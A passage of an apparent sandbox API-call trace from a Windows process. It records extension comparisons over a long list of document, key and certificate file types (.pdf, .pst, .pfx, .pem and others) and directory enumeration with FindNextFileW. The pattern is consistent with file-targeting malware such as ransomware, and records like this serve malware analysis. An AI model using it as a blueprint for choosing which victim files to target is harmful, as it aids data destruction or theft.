lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".ods") returned 4 [0293.015] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".oft") returned 4 [0293.015] lstrcmpiW (lpString1=".oft", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".one") returned 4 [0293.015] lstrcmpiW (lpString1=".one", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".onepkg") returned 7 [0293.015] lstrcmpiW (lpString1=".onepkg", lpString2="ces.dll") returned -1 [0293.015] lstrlenW (lpString=".onetoc2") returned 8 [0293.015] lstrcmpiW (lpString1=".onetoc2", lpString2="rces.dll") returned -1 [0293.015] lstrlenW (lpString=".opt") returned 4 [0293.015] lstrcmpiW (lpString1=".opt", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".oqy") returned 4 [0293.016] lstrcmpiW (lpString1=".oqy", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".orf") returned 4 [0293.016] lstrcmpiW (lpString1=".orf", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".p12") returned 4 [0293.016] lstrcmpiW (lpString1=".p12", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".p7b") returned 4 [0293.016] lstrcmpiW (lpString1=".p7b", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".p7c") returned 4 [0293.016] lstrcmpiW (lpString1=".p7c", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pam") returned 4 [0293.016] lstrcmpiW (lpString1=".pam", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pbm") returned 4 [0293.016] lstrcmpiW (lpString1=".pbm", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pct") returned 4 [0293.016] lstrcmpiW (lpString1=".pct", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pcx") returned 4 [0293.016] lstrcmpiW (lpString1=".pcx", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pdd") returned 4 [0293.016] lstrcmpiW (lpString1=".pdd", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pdf") returned 4 [0293.016] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pdp") returned 4 [0293.016] lstrcmpiW (lpString1=".pdp", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pef") returned 4 [0293.016] lstrcmpiW (lpString1=".pef", lpString2=".dll") returned 1 [0293.016] lstrlenW (lpString=".pem") returned 4 [0293.016] lstrcmpiW (lpString1=".pem", lpString2=".dll") returned 1 [0293.017] lstrlenW (lpString=".pff") returned 4 [0293.118] lstrcmpiW (lpString1=".pff", lpString2=".dll") returned 1 [0293.118] lstrlenW (lpString=".pfm") returned 4 [0293.118] lstrcmpiW (lpString1=".pfm", lpString2=".dll") returned 1 [0293.118] lstrlenW (lpString=".pfx") returned 4 [0293.118] lstrcmpiW (lpString1=".pfx", lpString2=".dll") returned 1 [0293.118] lstrlenW (lpString=".pgm") returned 4 [0293.118] lstrcmpiW (lpString1=".pgm", lpString2=".dll") returned 1 [0293.118] lstrlenW (lpString=".php") returned 4 [0293.118] lstrcmpiW (lpString1=".php", lpString2=".dll") returned 1 [0293.118] lstrlenW (lpString=".php3") returned 5 [0293.118] lstrcmpiW (lpString1=".php3", lpString2="s.dll") returned -1 [0293.118] lstrlenW (lpString=".php4") returned 5 [0293.118] lstrcmpiW (lpString1=".php4", lpString2="s.dll") returned -1 [0293.118] lstrlenW (lpString=".php5") returned 5 [0293.118] lstrcmpiW (lpString1=".php5", lpString2="s.dll") returned -1 [0293.118] lstrlenW (lpString=".phtml") returned 6 [0293.118] lstrcmpiW (lpString1=".phtml", lpString2="es.dll") returned -1 [0293.118] lstrlenW (lpString=".pict") returned 5 [0293.118] lstrcmpiW (lpString1=".pict", lpString2="s.dll") returned -1 [0293.118] lstrlenW (lpString=".pl") returned 3 [0293.119] lstrcmpiW (lpString1=".pl", lpString2="dll") returned -1 [0293.119] lstrlenW (lpString=".pls") returned 4 [0293.119] lstrcmpiW (lpString1=".pls", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".pm") returned 3 [0293.119] lstrcmpiW (lpString1=".pm", lpString2="dll") returned -1 [0293.119] lstrlenW (lpString=".png") returned 4 [0293.119] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".pnm") returned 4 [0293.119] lstrcmpiW (lpString1=".pnm", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".pot") returned 4 [0293.119] lstrcmpiW (lpString1=".pot", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".potm") returned 5 [0293.119] lstrcmpiW (lpString1=".potm", lpString2="s.dll") returned -1 [0293.119] lstrlenW (lpString=".potx") returned 5 [0293.119] lstrcmpiW (lpString1=".potx", lpString2="s.dll") returned -1 [0293.119] lstrlenW (lpString=".ppa") returned 4 [0293.119] lstrcmpiW (lpString1=".ppa", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".ppam") returned 5 [0293.119] lstrcmpiW (lpString1=".ppam", lpString2="s.dll") returned -1 [0293.119] lstrlenW (lpString=".ppm") returned 4 [0293.119] lstrcmpiW (lpString1=".ppm", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".pps") returned 4 [0293.119] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0293.119] lstrlenW (lpString=".ppsm") returned 5 [0293.119] lstrcmpiW (lpString1=".ppsm", lpString2="s.dll") returned -1 [0293.120] lstrlenW (lpString=".ppt") returned 4 [0293.120] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".pptm") returned 5 [0293.120] lstrcmpiW (lpString1=".pptm", lpString2="s.dll") returned -1 [0293.120] lstrlenW (lpString=".pptx") returned 5 [0293.120] lstrcmpiW (lpString1=".pptx", lpString2="s.dll") returned -1 [0293.120] lstrlenW (lpString=".prn") returned 4 [0293.120] lstrcmpiW (lpString1=".prn", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".ps") returned 3 [0293.120] lstrcmpiW (lpString1=".ps", lpString2="dll") returned -1 [0293.120] lstrlenW (lpString=".psb") returned 4 [0293.120] lstrcmpiW (lpString1=".psb", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".psd") returned 4 [0293.120] lstrcmpiW (lpString1=".psd", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".pst") returned 4 [0293.120] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".ptx") returned 4 [0293.120] lstrcmpiW (lpString1=".ptx", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".pub") returned 4 [0293.120] lstrcmpiW (lpString1=".pub", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".pwm") returned 4 [0293.120] lstrcmpiW (lpString1=".pwm", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".pxr") returned 4 [0293.120] lstrcmpiW (lpString1=".pxr", lpString2=".dll") returned 1 [0293.120] lstrlenW (lpString=".py") returned 3 [0293.120] lstrcmpiW (lpString1=".py", lpString2="dll") returned -1 [0293.120] lstrlenW (lpString=".qt") returned 3 [0293.121] lstrcmpiW (lpString1=".qt", lpString2="dll") returned -1 [0293.121] lstrlenW (lpString=".r3d") returned 4 [0293.121] lstrcmpiW (lpString1=".r3d", lpString2=".dll") returned 1 [0293.122] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.122] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0293.125] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.125] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0293.127] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.127] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0293.129] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.130] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0293.132] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.132] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0293.370] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.370] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0293.372] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.372] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0293.374] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.375] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0293.397] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.397] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0293.427] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.427] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0293.781] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.783] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0293.851] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.851] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0293.854] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.854] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0293.856] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.856] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0293.859] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.859] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0293.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.861] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it", cAlternateFileName="")) returned 1 [0293.862] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.862] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0293.864] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.864] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0293.866] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.866] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0293.917] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.918] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0294.011] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.011] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0294.018] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.018] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0294.026] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.026] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl", cAlternateFileName="")) returned 1 [0294.036] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.036] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0294.047] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.047] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0294.074] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.074] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0294.109] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.109] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-pt", cAlternateFileName="")) returned 1 [0294.413] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.413] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0294.442] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.442] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0294.777] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.777] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, 